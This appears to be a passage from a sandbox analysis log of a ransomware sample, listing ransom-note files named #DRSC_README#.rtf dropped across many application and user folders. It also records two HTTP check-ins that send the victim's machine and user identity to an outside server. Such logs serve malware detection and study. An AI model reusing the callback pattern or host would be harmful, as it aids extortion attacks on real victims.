C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{9e24beed-5df4-4172-ac31-adf717267680}\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.PPIProjection_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe HTTP URL 180 http://sec.timerz.org/addrecord.php?apikey=drsc_api_key&compuser=LZUKLIOU|Admin&sid=mmQLNZP1fpiDWOAf&phase=FINISH Process not Found File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\iq5q997v.default-release\OfflineCache\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\PFM\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\All Users\Microsoft\Network\Downloader\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{7b1712d5-db8b-44e9-acb7-d2fcdb28ca64}\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\HoloItemPlayerApp_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\lib\fonts\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\uk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe HTTP URL 181 http://sec.timerz.org/addrecord.php?apikey=drsc_api_key&compuser=LZUKLIOU|Admin&sid=mmQLNZP1fpiDWOAf&phase=[FIN]0F8D0919EAEB6D73|5120|96|5216 Process not Found File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\en-us\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ne-NP\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls.2\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\lib\management\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\rw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugins\rhp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iq5q997v.default-release\storage\permanent\chrome\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\tool\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ca-Es-VALENCIA\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\skins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\index-dir\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Templates.2\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls\Styles\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\MEIPreload\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files 